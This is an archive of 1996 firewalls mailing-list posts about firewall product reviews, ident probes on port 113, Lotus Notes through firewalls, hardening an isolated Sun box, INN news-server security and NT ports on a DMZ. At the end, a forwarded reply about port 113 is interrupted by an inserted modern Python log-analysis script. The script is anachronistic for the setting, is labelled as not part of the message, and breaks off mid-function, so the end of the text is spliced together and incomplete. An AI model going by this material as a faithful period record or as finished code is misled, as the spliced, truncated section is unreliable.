Network Computing (just arrived today) has a review of 6 firewall products. I haven't read it yet, I don't know which ones they are evaluating. It's a feature article though.

[ This message has been sent to the firewalls list. If you reply to this message to the list, please do not CC me on the reply.
I subscribe to the list and will read it there ]

--
____________________________________________________________________________
Doug Hughes
Engineering Network Services
System/Net Admin
Auburn University
doug@eng.auburn.edu
Pro is to Con as progress is to congress

From firewalls-owner Tue Feb 13 11:31:00 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA16781 for firewalls-outgoing; Tue, 13 Feb 1996 11:16:11 -0800 (PST)
Received: from vidnoe.yourtown.com (vidnoe.yourtown.com [199.125.234.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA16774 for ; Tue, 13 Feb 1996 11:16:07 -0800 (PST)
Received: from web (joechang.dialup.access.net) by vidnoe.yourtown.com (4.1/SMI-4.1) id AA03172; Tue, 13 Feb 96 14:14:30 EST
Message-Id: <3120E12E.485E@jcrew.com>
Date: Tue, 13 Feb 1996 14:06:22 -0500
From: Bill Van Emburg
Organization: J. Crew
X-Mailer: Mozilla 2.0b5 (X11; I; SunOS 5.4 sun4m)
Mime-Version: 1.0
To: Mark Lentczner
Cc: firewalls@greatcircle.com
Subject: Re: port 113?
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mark Lentczner wrote:
>
> Question: Has anyone identified (no pun intended) the web server software
> that does this useless ident probe? If it is a common server, what option
> is needed to turn it off. 113 beyond your own secure net is useless (see
> the useful information the ident server above will return!) and there is no
> reason for any Internet web server to use it.
>

HTTPD 1.3 uses the option, "IdentityCheck", to do this. It is off by default.

If it actually *were* an available service on more machines, it would be incredibly valuable for all sorts of things, from interactively determining that the same user is hitting different pages (and modifying content appropriately), to simply providing more accurate logging of sessions when massaging the log files.
Alas, it is *not* more commonly available, and it's a slow protocol to boot! Oh well....

-BVE (Bill Van Emburg)
(bve@yourtown.com)

From firewalls-owner Tue Feb 13 11:39:30 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA16728 for firewalls-outgoing; Tue, 13 Feb 1996 11:12:12 -0800 (PST)
Received: from pilot.firewall.is.chrysler.com (pilot.is.chrysler.com [204.189.94.147]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA16723 for ; Tue, 13 Feb 1996 11:11:52 -0800 (PST)
Received: by pilot.firewall.is.chrysler.com; id OAA22949; Tue, 13 Feb 1996 14:31:27 -0500
Received: from clhubgw1.is.chrysler.com(172.29.128.203) by pilot.is.chrysler.com via smap (g3.0.1) id sma022942; Tue, 13 Feb 96 14:31:09 -0500
Received: from mjp2lap.is.chrysler.com by clhubgw1.is.chrysler.com (5.x/SMI-4.1) id AA28115; Tue, 13 Feb 1996 14:12:30 -0500
Message-Id: <2.2.16.19960213191028.52ff9578@pop3hub.is.chrysler.com>
X-Sender: t0925mp@pop3hub.is.chrysler.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 13 Feb 1996 14:10:28 -0500
To: firewalls@greatcircle.com
From: Mike Papais
Subject: Firewalls and Lotus Notes Summary
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

As promised here is a brief summary of responses to my posting regarding what the rest of the world is doing regarding Notes through firewalls. I thank in advance all the contributors and commiserate with all the souls that are in the same boat.

The most common technique is to use "plug-gw" functionality to marry a pair of Notes Servers from the inside to the outside. This is reported to work very well. While not the absolute leading edge of security, it does provide significant functionality with a reasonable amount of control.

Several vendors (Checkpoint, V-One) responded that their offerings can play in this arena.
Checkpoint indicated that they are adept at supporting connectionless protocols and have worked well with Notes in the past. V-One offers middleware (Smartwall) that can enhance the Notes Encryption and further deepen the bag of tricks available to firewall administrators.

This posting is not to endorse either of these products, just to note their potential applicability.

Mike Papais
mjp2@is.chrysler.com
Chrysler Corporation
810-758-9781
Standard disclaimers apply.

From firewalls-owner Tue Feb 13 11:54:28 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA16687 for firewalls-outgoing; Tue, 13 Feb 1996 11:08:32 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA16682 for ; Tue, 13 Feb 1996 11:08:26 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id LAA14102; Tue, 13 Feb 1996 11:04:50 -0800
Received: from dns.eng.auburn.edu(131.204.10.13) by mycroft via smap (V1.3mjr) id sma014100; Tue Feb 13 11:04:19 1996
Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id NAA06464 for ; Tue, 13 Feb 1996 13:05:24 -0600 (CST)
From: Doug Hughes
Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id NAA22766; Tue, 13 Feb 1996 13:05:22 -0600
Date: Tue, 13 Feb 1996 13:05:22 -0600
Subject: Re: Isolated box...
To: firewalls@greatcircle.com
Message-Id:
In-Reply-To: <9602130708.AA22999@afya.acs.uwosh.edu>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
>Hi all,
>
>This may not be entirely relevant for firewalls, but I think it is
>close, so...
>
>I have an opportunity to get a couple of old Sun IPCs to use to
>provide services such as RARP, bootp/dhcp, bootparams, etc as well as
>some network listening.
>RARP under SunOS 4.1.n needs the /dev/nit
>device, which I do not want to put on an "open" machine.
>
>Would stripping all services from /etc/inetd, stopping nfs, NIS, etc,
>basically only allowing console logins, and only supporting sendmail
>going out, ftp going out, pulling unneeded devices/filesystem
>types/etc out of the kernel, etc be sufficient protection for this
>box, or are there some other parameters that would need to be tweaked
>either in the kernel at run time or in some header files?
>

Sounds like you've got the hang of it. Get rid of everything out of inetd.. Heck, you might not want to even run it at all.. Not having an /etc/exports file means NFS won't start. You could comment out the biods too, for that matter, if you're not mounting anything. Sounds like you wouldn't need sendmail at all.

Heck, you could even not have a default route out of this puppy.. People can bombard it all they want, and it wouldn't know how to reply if it didn't have the route. We use this technique on some of our NFS servers. You can add a static route by hand, do your thing, and delete it when you're done if you need to. Once you've done this, the device is essentially inaccessible except via console. Don't need to run sendmail daemon at all either.

>Basically I would like to lock that /dev/nit device into a controlled
>environment. It would be a pain in the butt to administer, but it
>should not require much in the way of maintenance.
>

You wouldn't even have to update security holes since nobody can log in to it. You can remove all the ptys and ttys except for the console (unless you plan on running windows, in which case you'll need a couple for terminal windows). It might be a bit ugly, because you'll have to update the databases by hand, which, as you said, will be a pain in the butt to administer.
tradeoff: If these are for those broadcast protocols as you mentioned, you might want to not make it totally inaccessible to your internal net, but just remove the route to the outside world. (at your discretion). This will make administration easier while lessening battened down security somewhat. [ This message has been posted to the firewalls list. Please do not CC myself if you reply to the list. I will read replies sent to the list, and don't need two. Thanks. ] -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Pro is to Con as progress is to congress From firewalls-owner Tue Feb 13 13:03:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA18691 for firewalls-outgoing; Tue, 13 Feb 1996 12:29:54 -0800 (PST) Received: from uu2.psi.com (uu2.psi.com [128.145.228.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA18677 for ; Tue, 13 Feb 1996 12:29:48 -0800 (PST) Received: by uu2.psi.com (5.65b/4.0.940727-PSI/PSINet) via UUCP; id AA10593 for ; Tue, 13 Feb 96 09:12:55 -0500 Received: from keywest.ccifl.com (keywest.ARPA) by ccifl.com (4.1/3.2.012693-CAD CAM Southeast); id AA12023 for GreatCircle.COM!firewalls; Tue, 13 Feb 96 09:00:11 EST Received: by keywest.ccifl.com (5.x/SMI-SVR4) id AA11752; Tue, 13 Feb 1996 08:57:33 -0500 Date: Tue, 13 Feb 1996 08:57:33 -0500 From: mark@ccifl.com (Mark Sherman) Message-Id: <9602131357.AA11752@keywest.ccifl.com> To: firewalls@GreatCircle.COM Subject: Re: your mail X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From firewalls-owner@GreatCircle.COM Mon Feb 12 17:54:12 1996 > Date: Mon, 12 Feb 1996 10:52:24 -0800 (PST) > From: Kent Dahlgren > To: Oliver Friedrichs > Cc: Brosl Hasslacher , firewalls@GreatCircle.COM > Subject: Re: your mail > Mime-Version: 1.0 > > > On Mon, 12 Feb 1996, Oliver Friedrichs wrote: > 
> > You realize this was posted from a hacked account right ?
>
> I'll bet dimes to doughnuts the prankster is reading these group postings, snickering to him or herself. Real proud. Probably one of those geeks who spend their weekends in IRC flooding people. Has the owner of the "hacked" account replied yet?
>
> Hey, look what I can do using an ordinary text editor like vi:
>
> total 15576
> drwx------ 59 tsutomu 5120 Feb 12 09:35 .
> drwxr-xr-x 26 root 1024 Feb 9 13:12 ..
> -rw------- 1 tsutomu 148 Jun 15 1995 .Xauthority
> -rw------- 1 tsutomu 690 Oct 19 09:13 .cshrc
> -rw------- 1 tsutomu 4849 Jul 12 1995 .emacs
> -rw------- 1 tsutomu 555 Jan 3 07:12 .login
> drwx------ 2 tsutomu 5632 Dec 27 13:07 .netscape-cache
>
> Hell, as far as that goes, I can make it look like I hacked anyone's account:
>
> total 15576
> drwx------ 59 winniethepooh 5120 Feb 12 09:35 .
> drwxr-xr-x 26 root 1024 Feb 9 13:12 ..
> -rw------- 1 winniethepooh 148 Jun 15 1995 .Xauthority
> -rw------- 1 winniethepooh 690 Oct 19 09:13 .cshrc
> -rw------- 1 winniethepooh 4849 Jul 12 1995 .emacs
> -rw------- 1 winniethepooh 555 Jan 3 07:12 .login
> drwx------ 2 winniethepooh 5632 Dec 27 13:07 .netscape-cache
>
> Man, this wild wacky world of hacking is really cool! Maybe I'll get chicks! Maybe I'll get a life!
>

Hacked? Not hacked? Let's give him/her some more bandwidth, that'll stop 'em. HUH?
From firewalls-owner Tue Feb 13 15:54:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA23983 for firewalls-outgoing; Tue, 13 Feb 1996 15:46:36 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA23978 for ; Tue, 13 Feb 1996 15:46:33 -0800 (PST) Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id PAA08567; Tue, 13 Feb 1996 15:45:56 -0800 Received: from caribe.eng.sun.com (caribe-85.Eng.Sun.COM) by Eng.Sun.COM (5.x/SMI-5.3) id AA00398; Tue, 13 Feb 1996 15:45:52 -0800 Received: from chapp.eng.sun.com (chapp [129.146.85.56]) by caribe.eng.sun.com (8.7.1/8.7.1) with SMTP id PAA25288 for ; Tue, 13 Feb 1996 15:45:02 -0800 (PST) Received: by chapp.eng.sun.com (5.x/SMI-SVR4) id AA18484; Tue, 13 Feb 1996 15:46:27 -0800 Date: Tue, 13 Feb 1996 15:46:27 -0800 From: jsampson@caribe-85.Eng.Sun.COM (James Sampson [TEMP]) Message-Id: <9602132346.AA18484@chapp.eng.sun.com> To: firewalls@greatcircle.com Subject: firewall development project X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for an experienced firewall developer to become part of a start-up firewall project. 
If interested or to get more info please contact me at: 415-786-6851 415-786-2512 fax thank you Jim Sampson

From firewalls-owner Tue Feb 13 17:50:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA25427 for firewalls-outgoing; Tue, 13 Feb 1996 16:46:43 -0800 (PST) Received: from teal.csn.net (teal.csn.net [199.117.27.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA25413 for ; Tue, 13 Feb 1996 16:46:19 -0800 (PST) Received: (from surguine@localhost) by teal.csn.net (8.6.12/8.6.9) id RAA09593; Tue, 13 Feb 1996 17:45:36 -0700 Date: Tue, 13 Feb 1996 17:45:36 -0700 From: Scott Surguine Message-Id: <199602140045.RAA09593@teal.csn.net> To: firewalls@greatcircle.com Subject: INN/NNTP Security Implications Cc: surguine@teal.csn.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello Folks,

I have a few questions regarding Security Concerns and INN/NNTP. Our site consists entirely of WEB Servers. We utilize a Packet Filter on a CISCO 2501. Our Stance is as follows: Anything which is not implicitly allowed is denied. We currently have the need to provide private newsgroups for some of our WEB servers. Hence, I have configured INN to provide "private" service only.

What are the security implications of allowing traffic across port 119 for accessing (reading, posting, etc ...) our "private" newsgroups on our Newsserver? If I do not configure my site to obtain newsfeeds from outside our site, can someone still spoof feeds to my site? Does anyone know of specific security related issues regarding INN? I am configuring INN1.4sec, which is a "security" patch to INN1.4. Can someone explain what hole INN1.4sec patches? Are there any known methods by which "Automatic Group Creation" can take place in INN?

MANY THANKS IN ADVANCE, Scott A.
Surguine surguine@csn.net

From firewalls-owner Tue Feb 13 18:56:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA29658 for firewalls-outgoing; Tue, 13 Feb 1996 18:38:47 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA29645 for ; Tue, 13 Feb 1996 18:38:40 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA00889; Tue, 13 Feb 96 20:34:40 CST Date: Tue, 13 Feb 96 20:34:40 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602140234.AA00889@garrison.com.> To: firewalls@greatcircle.com, sengle@hti.net, BROWNMK@misf.network.com Subject: RE: Gauntlet 3.1 Packet Filter? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

BROWNMK@misf.network.com wrote:
> You're looking for the NSC equipment, i.e. BorderGuard.
> check out www.network.com and look at security stuff.
>
> _____________________________________________________

sengle@hti.net wrote:
> Subject: Gauntlet 3.1 Packet Filter?
> Date: Monday, February 12, 1996 2:00PM
>
> Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny
> source / destination)? Or is it purely an application level proxy services
> approach?
>
> If I have IP traffic for which there is no proxy, how can I control
> this traffic without writing a custom proxy?
>
> If it does packet-filter, how (well) are the proxy "rules" integrated with
> the packet-filtering "rules"?
>
> I checked out the TIS web site and could not find any specific statements
> toward "yes, it packet filters".

Don't forget to mention that your BorderGuard product is simply a packet filtering mechanism.
From firewalls-owner Tue Feb 13 20:39:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA02679 for firewalls-outgoing; Tue, 13 Feb 1996 20:31:56 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA02674 for ; Tue, 13 Feb 1996 20:31:52 -0800 (PST) Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQacta15606; Tue, 13 Feb 1996 08:43:29 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA07282; Tue, 13 Feb 96 08:32:25 EST Date: Tue, 13 Feb 1996 08:32:25 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: PC Magazine article on firewalls Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The March 12, 1996 edition of PC Magazine (Ziff-Davis Publishing) has an article on firewalls starting on page NE1. The Editor's Choice goes to the TIS Gauntlet. No argument with that selection but I am surprised they made an Editor's Choice at all. Usually a firewall is customized to the needs of the site and the needs of sites are often completely different from each other. Anyway, on to the reason for this posting. The article says that Firewall-1 is available for HP-UX 9. and HP-UX 10. Is this true or is that just the garbage out from a salesdroid? 
Sick Puppy, OJ Simpson's Cut_and_Slash_Dawg wearer of Isotoner gloves [ WARNING: sniffing Fade RedNeck's rear may be hazardous to your health ] [ in case of overdose, chew massive amounts of anti-histamines ] From firewalls-owner Tue Feb 13 20:54:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA02880 for firewalls-outgoing; Tue, 13 Feb 1996 20:41:04 -0800 (PST) Received: from han.hana.nm.kr (han.hana.nm.kr [128.134.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA02816 for ; Tue, 13 Feb 1996 20:39:29 -0800 (PST) Received: from saitgw.Sait.Samsung.Co.KR by han.hana.nm.kr (4.1/KUM-0.1) id AA08109; Wed, 14 Feb 96 13:46:09 KST Received: from noc.sait.samsung.co.kr. by saitgw.Sait.Samsung.Co.KR (4.1/SMI-4.1) id AA25723; Wed, 14 Feb 96 13:33:33 KST Received: from fiji.info.samsung.co.kr by noc.sait.samsung.co.kr. (8.6.9H1/SMI-SVR4) id NAA24424; Wed, 14 Feb 1996 13:47:57 +0900 Date: Wed, 14 Feb 1996 13:47:57 +0900 Message-Id: <199602140447.NAA24424@noc.sait.samsung.co.kr.> X-Sender: kes@coda.info.samsung.co.kr X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: "Kang, Eun-Seong" Subject: Re: Re: Firewall comparison chart??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Have you ever been to http://www.data.com/Lab_Tests/Firewalls.html? There are very helpful comparison data for some firewalls. At 01:07 PM 96/02/13 -0600, you wrote: > >Network Computing (just arrived today) has a review of 6 firewall >products. I haven't read it yet, I don't know which ones they are >evaluating. It's a feature article though. > >[ This message has been sent to the firewalls list. If you reply to > this message to the list, please do not CC me on the reply. 
I subscribe > to the list and will read it there ]
>
>
>--
>____________________________________________________________________________
>Doug Hughes Engineering Network Services
>System/Net Admin Auburn University
> doug@eng.auburn.edu
> Pro is to Con as progress is to congress
>
>

-------------------------------------------------------------------
Kang, Eun-Seong Samsung Electronics Co, Ltd. kes@coda.info.samsung.co.kr San 14, Nongseo-Ri, Kihung-Eup, phone) +82-331-280-9425 Yongin-Kun, Kyungki-Do, Korea.
-------------------------------------------------------------------

From firewalls-owner Wed Feb 14 01:39:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA09583 for firewalls-outgoing; Wed, 14 Feb 1996 01:11:35 -0800 (PST) Received: from ncept.pt.nce.sita.int (ncept.pt.nce.sita.int [57.7.6.251]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA09578 for ; Wed, 14 Feb 1996 01:11:24 -0800 (PST) Received: from pc_ptdv.pt.nce.sita.int by ncept.pt.nce.sita.int (8.7.3/SitaNet-1.4) id KAA14597; Wed, 14 Feb 1996 10:14:38 +0100 (MET) Date: Wed, 14 Feb 96 09:36:34 PST From: Denis Valois Subject: RE: Firewall comparison chart??? To: Phil Davidson Cc: firewalls@greatcircle.com X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Tue, 13 Feb 96 11:27:25 GMT Phil Davidson wrote:
>Just wondering if anyone has seen a chart that compares
>the various Firewall packages currently available.
>The kind that lists which features are available
>or not on the different packages.
>
>cheers
>Phil
>

The most complete chart I've seen is in the following ref. George R. Kurtz & David Roath. "Shopping for Firewalls", in Infosecurity News, MIS Institute Press, 1995. [info: (508) 879-9792]. Very complete chart.
Includes "Product type", "proxies supported", "authentication supported", "authentication provided", "security features", "auditing features", "administration features", and "pricing and support". All the above categories are divided into 4-5 columns. There are 26 products/suppliers listed.

Denis Valois Internetworking Technologies, Security Team (NCEPWXS) SITA (Societe Internationale de Telecommunications Aeronautiques) HERAKLION - 1041 route des Dolines 06560 Valbonne France tel: (+33) 92.96.63.91 fax: (+33) 92.96.64.91 net: Denis.Valois@pt.nce.sita.int

From firewalls-owner Wed Feb 14 02:05:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA10853 for firewalls-outgoing; Wed, 14 Feb 1996 01:28:06 -0800 (PST) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA10816 for ; Wed, 14 Feb 1996 01:27:55 -0800 (PST) Received: from scorpian.europe.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA02236; Wed, 14 Feb 1996 04:27:16 -0500 Received: from mojo.europe.dg.com by scorpian.europe.dg.com (5.4R3.00/dg-s04) id AA25771; Wed, 14 Feb 1996 09:27:13 GMT Received: from pdavidson.europe.dg.com by mojo.europe.dg.com (5.4R3.10/dg-gens08) id AA21658; Wed, 14 Feb 1996 09:27:01 GMT Message-Id: <9602140927.AA21658@mojo.europe.dg.com> Comments: Authenticated sender is From: "Phil Davidson" Organization: Data General To: firewalls@greatcircle.com Date: Wed, 14 Feb 1996 09:28:09 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: a word of thanks Reply-To: fil@mojo.europe.dg.com X-Mailer: Pegasus Mail for Windows (v2.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Thanks to all who responded to my request for a Firewalls comparison chart.
It's most appreciated. cheers Phil

From firewalls-owner Wed Feb 14 02:54:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA14379 for firewalls-outgoing; Wed, 14 Feb 1996 02:47:25 -0800 (PST) Received: from gatekeeper.frontec.se (gatekeeper.frontec.se [193.13.192.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA14374 for ; Wed, 14 Feb 1996 02:47:15 -0800 (PST) Received: from tintin.lule.frontec.se (root@tintin.lule.frontec.se [192.36.15.4]) by gatekeeper.frontec.se (8.6.12/8.6.6) with SMTP id LAA23519 for ; Wed, 14 Feb 1996 11:46:05 +0100 Received: from goozer.arctic (goozer.lule.frontec.se) by tintin.lule.frontec.se with SMTP id AA08134 (5.67a8/IDA-1.5 for ); Wed, 14 Feb 1996 11:46:03 +0100 Received: by goozer.arctic (SMI-8.6/SMI-SVR4) id LAA00586; Wed, 14 Feb 1996 11:45:20 +0100 Date: Wed, 14 Feb 1996 11:45:20 +0100 From: Petter.Haggman@lule.frontec.se (Petter H{ggman) Message-Id: <199602141045.LAA00586@goozer.arctic> To: firewalls@GreatCircle.COM Subject: Win NT protocols? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Content-Md5: y704dREE89cHfljSdhq3zw== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi! Is there anyone who can enlighten me about NT's protocol ports? I've been asked for permission to put an NT server on the DMZ, and they want to be able to administer it from the inside. That means that I need to find out which ports are necessary to let this happen, and any security hazards involved...
I'd appreciate all facts and experiences...;-) Tia /Petter

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Petter Haggman Email: Petter.Haggman@lule.frontec.se Arctic Software AB Phone: +46 920 75116 , Fax: +46 920 75199 Aurorum 1, S-977 75 Lulea, Sweden GSM: 070 - 582 23 83

From firewalls-owner Wed Feb 14 03:24:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA15806 for firewalls-outgoing; Wed, 14 Feb 1996 03:14:37 -0800 (PST) Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA15771 for ; Wed, 14 Feb 1996 03:14:25 -0800 (PST) Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id GAA05275 for ; Wed, 14 Feb 1996 06:16:43 -0500 (EST) Received: from smtplink.jabil.com by mail.jabil.com id aa20073; 14 Feb 96 6:11 EST Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA824307224; Tue, 13 Feb 96 18:15:07 EST Date: Tue, 13 Feb 96 18:15:07 EST From: Kyle Amon Message-Id: <9601148243.AA824307224@jabil.com> To: firewalls@greatcircle.com Subject: Re: port 113? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Is there any reason (other than the loss of remote user identification services on my host) that I might _not_ want to disable identd? Seems to me I have no need for it.

Kyle Amon

______________________________ Forward Header __________________________________
Subject: Re: port 113?
Author: Bill Bunting at Smtplink_South
Date: 2/10/96 8:07 AM

At 11:36 AM 2/9/96 +0500, Jim Legg wrote:
>Hi,
>
>I noticed in my log files the following (just a snippet):
>
>2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn
>2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn
>2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn
>2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
>2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
>2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
>2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
>2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
>2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
>
>When this web site (nslookup returns Facade.COM) is accessed it tries to come back to your system on port 113. What is this port? (It's not listed in my /etc/services)

This is the ident protocol. The WWW server is trying to associate a user name with the connection by using the identification protocol. Sendmail will do the same thing (if configured).
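As an added example (not part of the forwarded message or of Jim Legg's log), the following Python parses the packet-filter log format quoted above and separates port-113 call-backs that follow one of our own outbound web connections from inbound ident SYNs with no such explanation. It assumes the field order shown in the quoted lines, that "!pass(64)" marks a packet dropped by rule 64, and adds one constructed line from 10.9.8.7 that has no matching outbound connection.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the same format as the packet-filter log quoted in the
# thread: timestamp, protocol, our host/port, direction, remote host/port,
# length, TCP flags, and "!pass(rule)" when the filter dropped the packet.
# The 10.9.8.7 line is made up to show a port-113 probe with no matching
# outbound web connection; the other lines mirror the quoted ones.
SAMPLE_LOG = """\
2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn
2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn
2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
2/9-10:43:30-81 tcp 199.18.25.195/113 <- 10.9.8.7/40000 44 syn !pass(64)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>\w+)\s+"
    r"(?P<lhost>[\d.]+)/(?P<lport>\w+)\s+(?P<dir><-|->)\s+"
    r"(?P<rhost>[\d.]+)/(?P<rport>\w+)\s+(?P<length>\d+)\s+(?P<flags>\S+)"
    r"(?:\s+!pass\((?P<rule>\d+)\))?\s*$"
)

# Numeric and /etc/services spellings of the ident port (RFC 1413).
IDENT_PORTS = {"113", "auth", "ident"}


@dataclass
class Event:
    ts: str
    proto: str
    local_host: str
    local_port: str
    inbound: bool            # True when the arrow is "<-" (remote side initiated)
    remote_host: str
    remote_port: str
    blocked: bool            # True when the line carries a "!pass(n)" verdict
    rule: Optional[int]      # the rule number inside "!pass(n)", if any


def parse_line(line: str) -> Optional[Event]:
    """Parse one log line; return None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rule = m["rule"]
    return Event(
        ts=m["ts"], proto=m["proto"],
        local_host=m["lhost"], local_port=m["lport"],
        inbound=(m["dir"] == "<-"),
        remote_host=m["rhost"], remote_port=m["rport"],
        blocked=rule is not None,
        rule=int(rule) if rule is not None else None,
    )


def parse_log(text: str) -> List[Event]:
    """Parse a whole log, silently skipping lines the pattern does not match."""
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def ident_callbacks(events: List[Event]) -> Dict[str, dict]:
    """Summarise inbound connections to the ident port, per remote host.

    A host we just connected to on www that comes back to port 113 is the
    ordinary ident lookup the thread describes; an inbound 113 SYN from a host
    we never talked to has no such explanation and deserves a second look.
    """
    talked_to = {e.remote_host for e in events if not e.inbound}
    summary: Dict[str, dict] = {}
    for e in events:
        if not (e.inbound and e.proto == "tcp" and e.local_port in IDENT_PORTS):
            continue
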